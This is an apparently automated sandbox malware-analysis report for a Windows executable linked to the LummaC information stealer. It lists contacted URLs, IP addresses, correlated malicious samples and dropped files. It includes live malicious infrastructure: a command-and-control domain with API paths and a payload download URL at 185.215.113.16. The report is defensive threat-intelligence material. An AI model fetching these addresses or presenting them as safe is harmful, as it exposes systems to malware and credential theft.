https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/aB	0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564938918.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1565469827.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564296751.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz:443/api;WU	0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://learn-video.azurefd.net/vod/player	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://github.com/gewarren	chromecache_112.6.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_112.6.dr	false		high
https://mindhandru.buzz/DataA4	0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exeeWebKit/537.36	0zBsv1tnt4.exe, 00000000.00000002.1870836699.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_112.6.dr	false		high
https://client-api.arkoselabs.com/v2/api.js	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Thraka	chromecache_112.6.dr	false		high
https://mindhandru.buzz/s	0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/==	0zBsv1tnt4.exe, 00000000.00000003.1537563256.000000000150C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://polymer.github.io/PATENTS.txt	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://aka.ms/certhelp	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://mindhandru.buzz/	0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mairaw	chromecache_112.6.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://schema.org	chromecache_101.6.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_121.6.dr, chromecache_101.6.dr	false		high
http://185.215.113.16/off/def.exeSd	0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/wK	0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1626048164.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/d	0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/yourcaliforniaprivacychoices	chromecache_112.6.dr	false		high
https://ac.ecosia.org/autocomplete?q=	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/nschonni	chromecache_112.6.dr	false		high
http://185.215.113.16/	0zBsv1tnt4.exe	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://github.com/adegeo	chromecache_112.6.dr	false		high
https://github.com/jonschlinkert/is-plain-object	chromecache_121.6.dr, chromecache_101.6.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://mindhandru.buzz:443/apiz	0zBsv1tnt4.exe, 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/js-cookie/js-cookie	chromecache_121.6.dr, chromecache_101.6.dr	false		high
http://185.215.113.16/off/def.exe	0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_112.6.dr	false		high
https://mindhandru.buzz/P)	0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://channel9.msdn.com/	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/try	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://mindhandru.buzz/tC	0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
104.21.11.101	mindhandru.buzz	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.8

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580958
Start date and time:	2024-12-26 14:13:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0zBsv1tnt4.exe renamed because original name is a hash value
Original Sample Name:	27e0a573048fadb3dd4b3b2454c8eda5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/67@9/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.22.50.131, 23.218.210.69, 172.217.21.35, 142.250.181.142, 173.194.220.84, 184.30.22.94, 172.217.17.46, 192.229.221.95, 2.19.126.156, 2.19.126.137, 142.250.181.42, 172.217.17.74, 142.250.181.74, 172.217.17.42, 172.217.19.234, 142.250.181.106, 142.250.181.138, 172.217.19.202, 199.232.210.172, 172.217.17.35, 2.16.168.100, 2.16.168.102, 4.245.163.56, 23.218.208.109, 13.107.246.63
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:14:25	API Interceptor	47x Sleep call for process: 0zBsv1tnt4.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse
185.215.113.16	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
104.21.11.101	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse
	ZX2M0AXZ56.exe	Get hash	malicious	LummaC	Browse
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse
	https://out.novastellz.de/i45/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mindhandru.buzz	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	P0SJULJxI0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	r06aMlvVyM.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	XM6cn2uNux.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	ZX2M0AXZ56.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
s-part-0035.t-0009.t-msedge.net	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	90m2xwxCOf.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	tFDKSN3TdH.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	V2s8yjvIJw.exe	Get hash	malicious	Iris Stealer	Browse	13.107.246.63
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	9InQHaM8hT.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	185.215.113.206
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
CLOUDFLARENETUS	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.134.27
	installer.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MaZjv5XeQi.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	jT7sgjdTea.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Y4svWfRK1L.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	23.206.229.226
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse	23.206.229.226
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	23.206.229.226
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	23.206.229.226
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.206.229.226
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.206.229.226
	https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9	Get hash	malicious	Unknown	Browse	23.206.229.226
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	23.206.229.226
	gVMKOpATpQ.exe	Get hash	malicious	Unknown	Browse	23.206.229.226
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	23.206.229.226
a0e9f5d64349fb13191bc781f81f42e1	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	tJd3ArrDAm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	gdtJGo7jH3.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	oQSTpQfzz5.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rkPR0Fo9Cb.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35jPLNPb3r.exe	Get hash	malicious	LummaC	Browse	104.21.11.101

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9781387892393205
Encrypted:	false
SSDEEP:	48:8Z0dYsT9FsHzidAKZdA1oehwiZUklqehhy+3:8ZJsfliy
MD5:	00EBD1C61E9D4B9D279E5C9D78E294AE
SHA1:	B3D6522A46B02CB7B25D826B478AC3F51B8C527E
SHA-256:	A31E43D760D9920DD415849BBE752D72CC931EE07130A3344831D622476FBCC8
SHA-512:	D83DD7FDA36BFA92A03E6B837AE373DE513BC22DBD9C13A464FED103063BE9CBE419802000E7DA1535EAD4694E85C28976DD3946710474BC2298CFB2B4594886
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......+.W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.991025919670178
Encrypted:	false
SSDEEP:	48:8x80dYsT9FsHzidAKZdA1leh/iZUkAQkqehSy+2:8+Jsf/9Q/y
MD5:	C28D286DADA723EA979F44AFAEDB7309
SHA1:	D1CACC6405F510749C10A8EF8CF1D90A712BC966
SHA-256:	5E2FD7A09F6F8856C44F23011B046680F76EE5AA1383AEC4A6C13B1246BE7575
SHA-512:	E41A086AB17A6943D89A7BCC43173A8426B33333D17465D07C55B65E9E64168B3893A500515B7DA34864A0AF3BED2A16493A4EAF903ED348805AB65BC32C4D91
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....~.+.W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.i....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.003984322686263
Encrypted:	false
SSDEEP:	48:8s0dYsT9FbHzidAKZdA14t5eh7sFiZUkmgqeh7sgy+BX:8sJsfynmy
MD5:	B58AF33A034354F0F053789CB47087A9
SHA1:	784E826C9C0096E51F7F7AE47FA0DC99712097FD
SHA-256:	48FF101F7BF3C9C7B2298585B7AE07770706B78CCE42B9A1253ACD6A27F8B1A3
SHA-512:	730CC956D2AC6A4F30E9C9C841BE413A3B2DD1516596E032BEF83C726E3A5AF6BADD15DA5D01AE62EA7EA12761149F9064EB91B4A3DCB2D647709EBA3C6FB1F4
Malicious:	false
Reputation:	low
